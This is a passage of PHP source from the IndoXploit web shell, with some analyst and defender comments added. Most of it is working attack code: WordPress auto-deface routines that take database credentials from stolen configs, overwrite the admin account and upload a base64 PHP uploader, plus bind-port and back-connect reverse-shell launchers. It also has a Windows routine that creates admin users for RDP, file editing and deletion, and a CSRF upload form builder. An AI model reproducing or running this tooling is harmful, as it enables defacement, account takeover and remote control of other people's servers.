  1453. $data3 = curl_exec($ch);
  1454. curl_close($ch);
  1455. $y = date("Y");
  1456. $m = date("m");
  1457. $namafile = "id.php";
  1458. $fpi = fopen($namafile,"w");
  1459. fputs($fpi,$script);
  1460. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1461. curl_setopt($ch6, CURLOPT_POST, true);
  1462. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1463. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1464. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1465. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1466. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1467. $postResult = curl_exec($ch6);
  1468. curl_close($ch6);
  1469. $as = "$target/k.php";
  1470. $bs = anucurl($as);
  1471. if(preg_match("#$script#is", $bs)) {
  1472. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1473. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1474. } else {
  1475. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1476. echo "[!!] coba aja manual: <br>";
  1477. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1478. echo "[+] username: <font color=lime>$user</font><br>";
  1479. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1480. }
  1481. mysql_close($conn);
  1482. }
  1483. }
  1484. }
  1485. } else {
  1486. echo "<center><h1>WordPress Auto Deface</h1>
  1487. <form method='post'>
  1488. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1489. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1490. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1491. </form>
  1492. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1493. </center>";
  1494. }
  1495. } elseif($_GET['do'] == 'auto_dwp2') {
  1496. if($_POST['auto_deface_wp']) {
  1497. function anucurl($sites) {
        // Analyst note: HTTP(S) fetch helper for the auto_dwp2 branch; in that branch it
        // is also used to download the remote configuration listings supplied in the form.
        //   $sites - URL to request
        // Returns the response body as a string, following redirects.
        // Indicators visible here: a fixed Firefox 32 / Windows NT 6.1 User-Agent string,
        // a 5-second connect timeout, and a cookie.txt cookie jar in the working directory.
  1498. $ch = curl_init($sites);
  1499. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1500. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1501. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1502. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        // Both certificate checks are disabled: any TLS certificate is accepted.
  1503. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1504. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1505. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1506. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1507. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1508. $data = curl_exec($ch);
  1509. curl_close($ch);
  1510. return $data;
  1511. }
  1512. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
        // Analyst note: submits a WordPress-style login form (auto_dwp2 branch).
        //   $cek       - URL the form is POSTed to (the caller passes "$target/wp-login.php")
        //   $web       - value for the redirect_to field
        //   $userr     - value for the log (username) field
        //   $pass      - value for the pwd (password) field
        //   $wp_submit - value for the wp-submit button field
        // Returns the response body after following redirects.
        // Session cookies are kept in cookie.txt in the working directory.
  1513. $post = array(
  1514. "log" => "$userr",
  1515. "pwd" => "$pass",
  1516. "rememberme" => "forever",
  1517. "wp-submit" => "$wp_submit",
  1518. "redirect_to" => "$web",
  1519. "testcookie" => "1",
  1520. );
  1521. $ch = curl_init($cek);
  1522. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1523. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1524. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        // TLS certificate and host-name verification are both turned off.
  1525. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1526. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1527. curl_setopt($ch, CURLOPT_POST, 1);
        // Passing an array makes cURL send the body as multipart/form-data.
  1528. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1529. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1530. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1531. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1532. $data = curl_exec($ch);
  1533. curl_close($ch);
  1534. return $data;
  1535. }
  1536. $link = explode("\r\n", $_POST['link']);
  1537. $script = htmlspecialchars($_POST['script']);
  1538. $user = "indoxploit";
  1539. $pass = "indoxploit";
  1540. $passx = md5($pass);
  1541. foreach($link as $dir_config) {
  1542. $config = anucurl($dir_config);
  1543. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1544. $dbuser = ambilkata($config,"DB_USER', '","'");
  1545. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1546. $dbname = ambilkata($config,"DB_NAME', '","'");
  1547. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1548. $prefix = $dbprefix."users";
  1549. $option = $dbprefix."options";
  1550. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1551. $db = mysql_select_db($dbname);
  1552. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1553. $result = mysql_fetch_array($q);
  1554. $id = $result[ID];
  1555. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1556. $result2 = mysql_fetch_array($q2);
  1557. $target = $result2[option_value];
  1558. if($target == '') {
  1559. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1560. } else {
  1561. echo "[+] $target <br>";
  1562. }
  1563. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1564. if(!$conn OR !$db OR !$update) {
  1565. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1566. mysql_close($conn);
  1567. } else {
  1568. $site = "$target/wp-login.php";
  1569. $site2 = "$target/wp-admin/theme-install.php?upload";
  1570. $b1 = anucurl($site2);
  1571. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1572. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1573. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1574. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1575. $www = "m.php";
  1576. $fp5 = fopen($www,"w");
  1577. fputs($fp5,$upload3);
  1578. $post2 = array(
  1579. "_wpnonce" => "$anu2",
  1580. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1581. "themezip" => "@$www",
  1582. "install-theme-submit" => "Install Now",
  1583. );
  1584. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1585. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1586. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1587. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1588. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1589. curl_setopt($ch, CURLOPT_POST, 1);
  1590. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1591. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1592. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1593. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1594. $data3 = curl_exec($ch);
  1595. curl_close($ch);
  1596. $y = date("Y");
  1597. $m = date("m");
  1598. $namafile = "id.php";
  1599. $fpi = fopen($namafile,"w");
  1600. fputs($fpi,$script);
  1601. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1602. curl_setopt($ch6, CURLOPT_POST, true);
  1603. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1604. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1605. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1606. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1607. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1608. $postResult = curl_exec($ch6);
  1609. curl_close($ch6);
  1610. $as = "$target/k.php";
  1611. $bs = anucurl($as);
  1612. if(preg_match("#$script#is", $bs)) {
  1613. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1614. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1615. } else {
  1616. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1617. echo "[!!] coba aja manual: <br>";
  1618. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1619. echo "[+] username: <font color=lime>$user</font><br>";
  1620. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1621. }
  1622. mysql_close($conn);
  1623. }
  1624. }
  1625. } else {
  1626. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1627. <form method='post'>
  1628. Link Config: <br>
  1629. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1630. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1631. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1632. </form></center>";
  1633. }
  1634. } elseif($_GET['do'] == 'network') {
  1635. echo "<form method='post'>
  1636. <u>Bind Port:</u> <br>
  1637. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1638. <input type='submit' name='sub_bp' value='>>'>
  1639. </form>
  1640. <form method='post'>
  1641. <u>Back Connect:</u> <br>
  1642. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1643. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1644. <input type='submit' name='sub_bc' value='>>'>
  1645. </form>";
  1646. $bind_port_p="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";
  1647. if(isset($_POST['sub_bp'])) {
        // Analyst note: handler for the form labelled "Bind Port". The embedded payload is
        // not present in this copy of the file, so its exact behaviour cannot be read here.
        // The decoded payload is written to /tmp/bp.pl.
  1648. $f_bp = fopen("/tmp/bp.pl", "w");
  1649. fwrite($f_bp, base64_decode($bind_port_p));
  1650. fclose($f_bp);
  1651.  
        // The port comes straight from the request and is placed into the command line
        // unescaped. exe() is defined outside this excerpt; presumably it runs a shell
        // command and returns its output - confirm against its definition.
  1652. $port = $_POST['port_bind'];
        // Output is discarded and the command is put in the background with "&".
  1653. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1654. sleep(1);
  1655. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
        // The script file is deleted about one second after launch, so the on-disk
        // artefact is short-lived. Defender view: look for a perl process started by the
        // web server user whose script path (/tmp/bp.pl) no longer exists, and for an
        // unexpected listening socket owned by that user.
  1656. unlink("/tmp/bp.pl");
  1657. }
  1658. $back_connect_p="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";
  1659. if(isset($_POST['sub_bc'])) {
        // Analyst note: handler for the form labelled "Back Connect". The embedded payload
        // is not present in this copy of the file, so its exact behaviour cannot be read here.
        // The base64-decoded value of $bind_connect_p is written to /tmp/bc.pl.
  1660. $f_bc = fopen("/tmp/bc.pl", "w");
  1661. fwrite($f_bc, base64_decode($bind_connect_p));
  1662. fclose($f_bc);
  1663.  
        // Address and port come straight from the request and are placed into the command
        // line unescaped. exe() is defined outside this excerpt; presumably it runs a
        // shell command and returns its output - confirm against its definition.
  1664. $ipbc = $_POST['ip_bc'];
  1665. $port = $_POST['port_bc'];
        // Output is discarded and the command is put in the background with "&".
  1666. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1667. sleep(1);
  1668. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
        // The script file is deleted about one second after launch. Defender view: egress
        // filtering on the web tier, plus alerting on outbound connections opened by
        // interpreter processes that the web server user spawned, covers this pattern.
  1669. unlink("/tmp/bc.pl");
  1670. }
  1671. }
  1672. elseif($_GET['do'] == 'krdp_shell') {
  1673. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1674. if($_POST['create']) {
  1675. $user = htmlspecialchars($_POST['user']);
  1676. $pass = htmlspecialchars($_POST['pass']);
  1677. if(preg_match("/$user/", exe("net user"))) {
  1678. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1679. } else {
  1680. $add_user = exe("net user $user $pass /add");
        // Analyst note: this run creates a local Windows account and then tries to add it
        // to the local administrators group under three different group names.
        // $user and $pass come from the request and were only passed through
        // htmlspecialchars(), which escapes HTML and does not make a value safe for a
        // command line. The form further down pre-fills both fields with "indoxploit".
        // Defender view: the web server's worker process spawning net.exe, together with
        // Windows Security events 4720 (account created) and 4732 (member added to a
        // local group), is the detection surface for this action.
  1681. $add_groups1 = exe("net localgroup Administrators $user /add");
  1682. $add_groups2 = exe("net localgroup Administrator $user /add");
  1683. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1684. echo "[ RDP ACCOUNT INFO ]<br>
  1685. ------------------------------<br>
  1686. IP: <font color=lime>".$ip."</font><br>
  1687. Username: <font color=lime>$user</font><br>
  1688. Password: <font color=lime>$pass</font><br>
  1689. ------------------------------<br><br>
  1690. [ STATUS ]<br>
  1691. ------------------------------<br>
  1692. ";
  1693. if($add_user) {
  1694. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1695. } else {
  1696. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1697. }
  1698. if($add_groups1) {
  1699. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1700. } elseif($add_groups2) {
  1701. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1702. } elseif($add_groups3) {
  1703. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1704. } else {
  1705. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1706. }
  1707. echo "------------------------------<br>";
  1708. }
  1709. } elseif($_POST['s_opsi']) {
  1710. $user = htmlspecialchars($_POST['r_user']);
  1711. if($_POST['opsi'] == '1') {
  1712. $cek = exe("net user $user");
  1713. echo "Checking username <font color=lime>$user</font> ....... ";
  1714. if(preg_match("/$user/", $cek)) {
  1715. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1716. ------------------------------<br><br>
  1717. <pre>$cek</pre>";
  1718. } else {
  1719. echo "[ <font color=red>belum ada</font> ]";
  1720. }
  1721. } elseif($_POST['opsi'] == '2') {
  1722. $cek = exe("net user $user indoxploit");
  1723. if(preg_match("/$user/", exe("net user"))) {
  1724. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  1725. if($cek) {
  1726. echo "<font color=lime>Berhasil</font>";
  1727. } else {
  1728. echo "<font color=red>Gagal</font>";
  1729. }
  1730. } else {
  1731. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1732. }
  1733. } elseif($_POST['opsi'] == '3') {
  1734. $cek = exe("net user $user /DELETE");
  1735. if(preg_match("/$user/", exe("net user"))) {
  1736. echo "[remove user: <font color=lime>$user</font>] -> ";
  1737. if($cek) {
  1738. echo "<font color=lime>Berhasil</font>";
  1739. } else {
  1740. echo "<font color=red>Gagal</font>";
  1741. }
  1742. } else {
  1743. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1744. }
  1745. } else {
  1746. //
  1747. }
  1748. } else {
  1749. echo "-- Create RDP --<br>
  1750. <form method='post'>
  1751. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1752. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1753. <input type='submit' name='create' value='>>'>
  1754. </form>
  1755. -- Option --<br>
  1756. <form method='post'>
  1757. <input type='text' name='r_user' placeholder='username' required>
  1758. <select name='opsi'>
  1759. <option value='1'>Cek Username</option>
  1760. <option value='2'>Ubah Password</option>
  1761. <option value='3'>Hapus Username</option>
  1762. </select>
  1763. <input type='submit' name='s_opsi' value='>>'>
  1764. </form>
  1765. ";
  1766. }
  1767. } else {
  1768. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1769. }
  1770. } elseif($_GET['act'] == 'newfile') {
  1771. if($_POST['new_save_file']) {
  1772. $newfile = htmlspecialchars($_POST['newfile']);
  1773. $fopen = fopen($newfile, "a+");
  1774. if($fopen) {
  1775. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1776. } else {
  1777. $act = "<font color=red>permission denied</font>";
  1778. }
  1779. }
  1780. echo $act;
  1781. echo "<form method='post'>
  1782. Filename: <input type='text' name='newfile' value='$dir/hacked.php' style='width: 450px;' height='10'>
  1783. <input type='submit' name='new_save_file' value='Submit'>
  1784. </form>";
  1785. } elseif($_GET['act'] == 'newfolder') {
  1786. if($_POST['new_save_folder']) {
  1787. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1788. if(!mkdir($new_folder)) {
  1789. $act = "<font color=red>permission denied!</font>";
  1790. } else {
  1791. $act = "<script>window.location='?dir=".$dir."';</script>";
  1792. }
  1793. }
  1794. echo $act;
  1795. echo "<form method='post'>
  1796. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1797. <input type='submit' name='new_save_folder' value='Submit'>
  1798. </form>";
  1799. } elseif($_GET['act'] == 'rename_dir') {
  1800. if($_POST['dir_rename']) {
  1801. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1802. if($dir_rename) {
  1803. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1804. } else {
  1805. $act = "<font color=red>permission denied</font>";
  1806. }
  1807. echo "".$act."<br>";
  1808. }
  1809. echo "<form method='post'>
  1810. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1811. <input type='submit' name='dir_rename' value='rename'>
  1812. </form>";
  1813. } elseif($_GET['act'] == 'delete_dir') {
  1814. if(is_dir($dir)) {
  1815. if(is_writable($dir)) {
  1816. @rmdir($dir);
  1817. @exe("rm -rf $dir");
  1818. @exe("rmdir /s /q $dir");
  1819. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1820. } else {
  1821. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1822. }
  1823. }
  1824. echo $act;
  1825. } elseif($_GET['act'] == 'view') {
  1826. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1827. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1828. } elseif($_GET['act'] == 'edit') {
  1829. if($_POST['save']) {
  1830. $save = file_put_contents($_GET['file'], $_POST['src']);
  1831. if($save) {
  1832. $act = "<font color=lime>Saved!</font>";
  1833. } else {
  1834. $act = "<font color=red>permission denied</font>";
  1835. }
  1836. echo "".$act."<br>";
  1837. }
  1838. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1839. echo "<form method='post'>
  1840. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1841. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1842. </form>";
  1843. } elseif($_GET['act'] == 'rename') {
  1844. if($_POST['do_rename']) {
  1845. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1846. if($rename) {
  1847. $act = "<script>window.location='?dir=".$dir."';</script>";
  1848. } else {
  1849. $act = "<font color=red>permission denied</font>";
  1850. }
  1851. echo "".$act."<br>";
  1852. }
  1853. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1854. echo "<form method='post'>
  1855. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1856. <input type='submit' name='do_rename' value='rename'>
  1857. </form>";
  1858. }
  1859. elseif($_GET['act'] == 'delete') {
  1860. $delete = unlink($_GET['file']);
  1861. if($delete) {
  1862. $act = "<script>window.location='?dir=".$dir."';</script>";
  1863. } else {
  1864. $act = "<font color=red>permission denied</font>";
  1865. }
  1866. echo $act;
  1867. } else {
  1868. if(is_dir($dir) === true) {
  1869. if(!is_readable($dir)) {
  1870. echo "<font color=red>can't open directory. ( not readable )</font>";
  1871. } else {
  1872. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1873. <tr>
  1874. <th class="th_home"><center>Nama</center></th>
  1875. <th class="th_home"><center>Tipe</center></th>
  1876. <th class="th_home"><center>Ukuran</center></th>
  1877. <th class="th_home"><center>Terakhir Di Edit</center></th>
  1878. <th class="th_home"><center>Owner/Group</center></th>
  1879. <th class="th_home"><center>Hak Akses</center></th>
  1880. <th class="th_home"><center>Action</center></th>
  1881. </tr>';
  1882. $scandir = scandir($dir);
  1883. foreach($scandir as $dirx) {
  1884. $dtype = filetype("$dir/$dirx");
  1885. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1886. if(function_exists('posix_getpwuid')) {
  1887. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1888. $downer = $downer['name'];
  1889. } else {
  1890. //$downer = $uid;
  1891. $downer = fileowner("$dir/$dirx");
  1892. }
  1893. if(function_exists('posix_getgrgid')) {
  1894. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1895. $dgrp = $dgrp['name'];
  1896. } else {
  1897. $dgrp = filegroup("$dir/$dirx");
  1898. }
  1899. if(!is_dir("$dir/$dirx")) continue;
  1900. if($dirx === '..') {
  1901. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1902. } elseif($dirx === '.') {
  1903. $href = "<a href='?dir=$dir'>$dirx</a>";
  1904. } else {
  1905. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1906. }
  1907. if($dirx === '.' || $dirx === '..') {
  1908. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1909. } else {
  1910. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1911. }
  1912. echo "<tr>";
  1913. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1914. echo "<td class='td_home'><center>$dtype</center></td>";
  1915. echo "<td class='td_home'><center>-</center></th></td>";
  1916. echo "<td class='td_home'><center>$dtime</center></td>";
  1917. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1918. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1919. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1920. echo "</tr>";
  1921. }
  1922. }
  1923. } else {
  1924. echo "<font color=red>can't open directory.</font>";
  1925. }
  1926. foreach($scandir as $file) {
  1927. $ftype = filetype("$dir/$file");
  1928. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1929. $size = filesize("$dir/$file")/1024;
  1930. $size = round($size,3);
  1931. if(function_exists('posix_getpwuid')) {
  1932. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1933. $fowner = $fowner['name'];
  1934. } else {
  1935. //$downer = $uid;
  1936. $fowner = fileowner("$dir/$file");
  1937. }
  1938. if(function_exists('posix_getgrgid')) {
  1939. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1940. $fgrp = $fgrp['name'];
  1941. } else {
  1942. $fgrp = filegroup("$dir/$file");
  1943. }
  1944. if($size > 1024) {
  1945. $size = round($size/1024,2). 'MB';
  1946. } else {
  1947. $size = $size. 'KB';
  1948. }
  1949. if(!is_file("$dir/$file")) continue;
  1950. echo "<tr>";
  1951. echo "<td class='td_home'><img src='data:image/png;base64,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'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1952. echo "<td class='td_home'><center>$ftype</center></td>";
  1953. echo "<td class='td_home'><center>$size</center></td>";
  1954. echo "<td class='td_home'><center>$ftime</center></td>";
  1955. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1956. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1957. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1958. echo "</tr>";
  1959. }
  1960. echo "</table>";
  1961. if(!is_readable($dir)) {
  1962. //
  1963. } else {
  1964. echo "<hr>";
  1965. }
  1966. echo "<center>Copyright - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>&copy; IndoXploit</font></a></center>";
  1967. echo "<center>Recoded &copy; ".date("Y")." - <a href='http://www.official-0xcor3.ga/' target='_blank'><font color=yellow>0xCor3</font></a></center>";
  1968. }
  1969. if($_GET['do'] == 'hash_en') {
        // Dispatcher on the `do` query parameter; three operator panels follow
        // (hash_en, csrf, sym404). Analyst annotations only; the code is unchanged.
        //
        // hash_en: renders a one-field form and, once the submit button named
        // "md5" is posted, prints md5() of the posted text. The panel title says
        // "Encrypter", but MD5 is a one-way hash and nothing here is encrypted.
        // The branch only reads $_POST and echoes a hex digest.
  1970. echo '<center>
  1971. <p></rp>
  1972. <h3><font color=blue>Md5 Encrypter</font></h3>
  1973. <form action="" method="post">
  1974. Text : <input type="text" name="text" />
  1975. <input type="submit" name="md5" value="Create!" />
  1976. </form></center>';
        // Errors stay suppressed, so the undefined-index notices raised on a plain
        // GET (no POST body) never reach output or logs.
  1977. error_reporting(0);
  1978. $text = $_POST['text'];
        // The digest is computed on every request, even before the form is submitted.
  1979. $hash = md5($text);
  1980. $md5 = $_POST['md5'];
        // isset() is true only when the submit field was actually posted.
  1981. if(isset($md5))
  1982. {
  1983. echo "<center><font color=yellow>MD5 Hash :</font></center>";
  1984. echo '<center>';
  1985. echo $hash;
  1986. echo '</center>';
  1987. }
  1988. }
  1989. elseif($_GET['do'] == 'csrf') {
        // csrf: asks the operator for a URL and a form-field name, then emits a
        // second multipart upload form whose action is that URL and whose file
        // input carries that field name. The second form is submitted by the
        // operator's browser, so this host's logs only show the POST that built it.
        // Defensive takeaway for the receiving endpoint: an upload handler that
        // accepts such a cross-origin form post lacks authentication and/or an
        // anti-CSRF token check.
  1990. echo '<center><form method="post">
  1991. URL Web Target : <input type="text" name="url" size="50" height="10" placeholder="http://www.target.co.li/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1992. Type Name: <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / file_field / dan lain lain" style="margin: 5px auto; padding-left: 5px;" required><br>
  1993. <input type="submit" name="d" value="Lock Target!">
  1994. </form></center></td> </tr>';
  1995. $url = $_POST['url'];
  1996. $pf = $_POST['pf'];
  1997. $d = $_POST['d'];
        // $d is the submit button's value; any truthy value renders the second form.
  1998. if($d) {
        // $url and $pf are interpolated into the markup with no HTML escaping.
